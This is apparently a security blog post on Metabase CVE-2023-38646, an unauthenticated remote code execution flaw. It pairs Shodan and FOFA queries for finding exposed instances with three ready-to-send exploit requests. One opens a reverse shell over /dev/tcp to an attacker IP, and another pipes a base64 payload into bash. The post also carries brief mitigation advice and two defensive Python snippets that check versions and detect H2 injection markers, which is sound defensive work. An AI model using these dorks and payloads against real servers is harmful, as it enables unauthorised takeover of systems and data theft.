
Metabase RCE: CVE-2023-38646

Unveiling the Metabase Vulnerability: A Deep Dive into CVE-2023-38646

CVE-2023-38646, Metabase RCE: Metabase is a business intelligence and data visualization tool that has emerged as a preferred choice for seamlessly turning data into insightful dashboards.

However, recent revelations have cast a spotlight on a significant security flaw within Metabase versions prior to 0.46.6.1 for the open-source variant and 1.46.6.1 for the Enterprise edition.

This vulnerability, labeled CVE-2023-38646, allows attackers to execute arbitrary commands on the server without any authentication.


About the Vulnerability

According to the Assetnote blog, the root of the vulnerability lies in the Metabase API endpoint `/api/setup/validate`. This endpoint's purpose is to validate database connections during the setup process. A setup token, generated when Metabase is initialized, is required to access this endpoint.

This token was meant to aid in the completion of the initial setup and should ideally be used once. However, through meticulous analysis, researchers stumbled upon an unexpected twist – the setup token remained accessible even after the setup phase, creating a potential gateway for exploitation.
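One way to check your own instances for the exposure described above, as an added example that is not part of the original post or of Metabase's code: it reads a saved `/api/session/properties` response and reports whether the version is below the fixed release named on this page and whether a `setup-token` is still served after setup has completed. The response keys `setup-token`, `version.tag` and `has-user-setup` are assumed from current Metabase builds, and the sample bodies are constructed.

```python
"""Check one saved /api/session/properties response for CVE-2023-38646 exposure.
Added example, not Metabase code. Assumed keys: "setup-token",
"version" -> {"tag": "v0.46.1"}, "has-user-setup" (verify on your build)."""
import json
import re

# Fixed versions as named on this page: open source 0.46.6.1, Enterprise 1.46.6.1.
# Older release lines got separate backported fixes; compare those against the
# vendor advisory instead of trusting this table alone.
FIXED = {0: (0, 46, 6, 1), 1: (1, 46, 6, 1)}


def parse_version(tag: str) -> tuple:
    """'v0.46.1' -> (0, 46, 1); tolerates a leading 'v' and trailing suffixes."""
    m = re.match(r"v?(\d+(?:\.\d+)*)", tag.strip())
    if not m:
        raise ValueError(f"unrecognised version tag: {tag!r}")
    return tuple(int(p) for p in m.group(1).split("."))


def assess(props: dict) -> dict:
    """Return a verdict for one decoded /api/session/properties body."""
    version = parse_version(props.get("version", {}).get("tag", ""))
    edition = version[0]                         # 0 = open source, 1 = Enterprise
    fixed = FIXED.get(edition)
    below_fixed = fixed is not None and version < fixed
    # The vulnerable behaviour: a setup token still served once setup is complete.
    token_exposed = bool(props.get("setup-token")) and bool(props.get("has-user-setup"))
    return {
        "version": ".".join(map(str, version)),
        "below_fixed": below_fixed,
        "setup_token_exposed": token_exposed,
        "at_risk": below_fixed or token_exposed,
    }


def assess_body(body: str) -> dict:
    """Same as assess(), but takes the raw JSON text of the response."""
    return assess(json.loads(body))


# Constructed sample responses (not captured from a real server).
VULNERABLE = json.dumps({"version": {"tag": "v0.46.1"},
                         "setup-token": "00000000-0000-4000-8000-000000000000",
                         "has-user-setup": True})
PATCHED = json.dumps({"version": {"tag": "v1.46.6.1"},
                      "setup-token": None, "has-user-setup": True})

if __name__ == "__main__":
    for label, body in (("vulnerable", VULNERABLE), ("patched", PATCHED)):
        print(label, assess_body(body))
```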


Metabase Remote Code Execution

Moving beyond the initial setup token exposure, researchers embarked on a journey towards achieving reliable remote code execution (RCE). The `/api/setup/validate` endpoint accepted JDBC URIs, thereby opening avenues for exploitation through various database connectors.

While attempts to exploit H2 database’s INIT parameter were initially hindered, ingenious maneuvering led researchers to an SQL injection vulnerability within the H2 database driver. This newfound vulnerability allowed for code execution without relying on the previously obstructed INIT parameter.


Dork to Find Targets using Metabase

Shodan.io
– http.html:Metabase
– http.title:Metabase (twitter @win3zz)

FOFA app (twitter @HunterMapping)
– FOFA app="Metabase"
– Shodan product:"Metabase"

Twitter @fofabot
– FOFA Query: FOFA app="Metabase"
– Link: https://en.fofa.info/result?qbase64=YXBwPSJNZXRhYmFzZSI%3D


Proof Of Concept for CVE-2023-38646

To reproduce this vulnerability manually, follow these simple steps:

  1. Visit `/api/session/properties` and read the token from the `setup-token` field.
  2. Use one of the three POST requests below, which I gathered from Twitter, to reproduce the vulnerability:

Using the sample H2 database shipped inside Metabase's JAR file (recommended):

```http
POST /api/setup/validate HTTP/1.1
Host: 
Content-Type: application/json
Content-Length: 812

{
    "token": "YOUR-TOKEN",
    "details":
    {
        "is_on_demand": false,
        "is_full_sync": false,
        "is_sample": false,
        "cache_ttl": null,
        "refingerprint": false,
        "auto_run_queries": true,
        "schedules":
        {},
        "details":
        {
            "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,YOUR-BASE64}|{base64,-d}|{bash,-i}')\n$$--=x",
            "advanced-options": false,
            "ssl": true
        },
        "name": "an-sec-research-team",
        "engine": "h2"
    }
}
```


Using `org.h2.Driver` with the `postgres` engine:

```http
POST /api/setup/validate HTTP/1.1
Host: localhost:3000
Content-Length: 416
Accept: application/json
Content-Type: application/json
User-Agent: Mozilla/5.0 
Connection: close

{"token":"YOUR-TOKEN","details":{"details":{
"subprotocol":"h2",
"classname":"org.h2.Driver","advanced-options":true,
"subname":"mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=CREATE ALIAS SHELLEXEC AS $$ void shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(new String[]{\"sh\", \"-c\", cmd})\\;}$$\\;CALL SHELLEXEC('bash -i >&/dev/tcp/IP-REVERSE/1337 0>&1');"},"name":"x","engine":"postgres"}}
```


POST request 3, a little similar to the first:

```http
POST /api/setup/validate HTTP/1.1
Host: localhost:3000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 739

{
    "token": "YOUR-TOKEN",
    "details":
    {
        "is_on_demand": false,
        "is_full_sync": false,
        "is_sample": false,
        "cache_ttl": null,
        "refingerprint": false,
        "auto_run_queries": true,
        "schedules":
        {},
        "details":
        {
            "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;",
            "advanced-options": false,
            "ssl": true,
            "init": "CREATE TRIGGER shell3 BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\u000A\u0009java.lang.Runtime.getRuntime().exec('touch /tmp/success')\u000A$$"
        },
        "name": "an-sec-research-team",
        "engine": "h2"
    }
}
```


Other PoCs you can learn from are in this blog post: https://blog.calif.io/p/reproducing-cve-2023-38646-metabase. Or you can use this tool: https://github.com/robotmikhro/CVE-2023-38646


The Way Forward: Mitigation and Awareness

To address the CVE-2023-38646 vulnerability, Metabase released advisories and versions that offer remedies. Upgrading to versions 0.46.6.1 (open-source) and 1.46.6.1 (Enterprise) is the primary step to safeguard against potential exploitation. For instances where immediate upgrade isn’t feasible, blocking requests to `/api/setup` endpoints and meticulous monitoring are recommended steps. Additional insights, mitigation strategies, and release information can be accessed through Metabase’s official advisories.
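For the monitoring recommended above, here is an added example (not Metabase's code and not from the original post) that scans `/api/setup/validate` request bodies for the H2 JDBC markers that appear in the three PoC requests earlier on this page. It assumes a WAF or reverse-proxy hook that hands over the raw JSON body as a string; the sample bodies are constructed, with the trigger body left empty.

```python
"""Scan /api/setup/validate request bodies for the H2 JDBC markers used in the
PoCs above. Added example, not Metabase code; assumes a proxy or WAF hook that
passes the raw JSON body as a string."""
import json
import re

# Each indicator is taken from one of the three PoC requests on this page.
INDICATORS = [
    ("h2_engine", re.compile(r'"(engine|subprotocol)"\s*:\s*"h2"', re.I)),
    ("h2_driver", re.compile(r"org\.h2\.Driver", re.I)),
    ("h2_init", re.compile(r'\bINIT\s*=|"init"\s*:', re.I)),
    ("create_trigger_or_alias", re.compile(r"CREATE\s+(TRIGGER|ALIAS)\b", re.I)),
    ("jar_sample_db", re.compile(r'zip:[^"]*metabase\.jar!', re.I)),
    ("trace_to_stdout", re.compile(r"TRACE_LEVEL_SYSTEM_OUT", re.I)),
    ("runtime_exec", re.compile(r"Runtime\.getRuntime\(\)\.exec", re.I)),
]
H2_ONLY = {"h2_engine", "h2_driver"}


def inspect_body(body: str) -> list:
    """Return the names of all indicators present in one request body."""
    return [name for name, pattern in INDICATORS if pattern.search(body)]


def is_suspicious(body: str) -> bool:
    """Alert when the body selects H2 *and* carries an injection marker.
    H2 alone is not enough: an admin may legitimately validate a plain H2 URI."""
    hits = set(inspect_body(body))
    return bool(hits & H2_ONLY) and bool(hits - H2_ONLY)


# Constructed samples: a benign validation and a body shaped like PoC 3 above
# (trigger body left empty on purpose).
BENIGN = json.dumps({"token": "T", "details": {"engine": "postgres", "details": {
    "host": "db.internal", "port": 5432, "dbname": "reports"}}})
MALICIOUS = json.dumps({"token": "T", "details": {"engine": "h2", "details": {
    "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;",
    "init": "CREATE TRIGGER t BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$ $$"}}})

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("malicious", MALICIOUS)):
        print(label, inspect_body(body), is_suspicious(body))
```

Blocking `/api/setup` at the proxy once setup is done, as the page recommends, removes the need for this check entirely; the scanner is for the window before that block is in place.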

Author: Christin (https://secry.me/explore)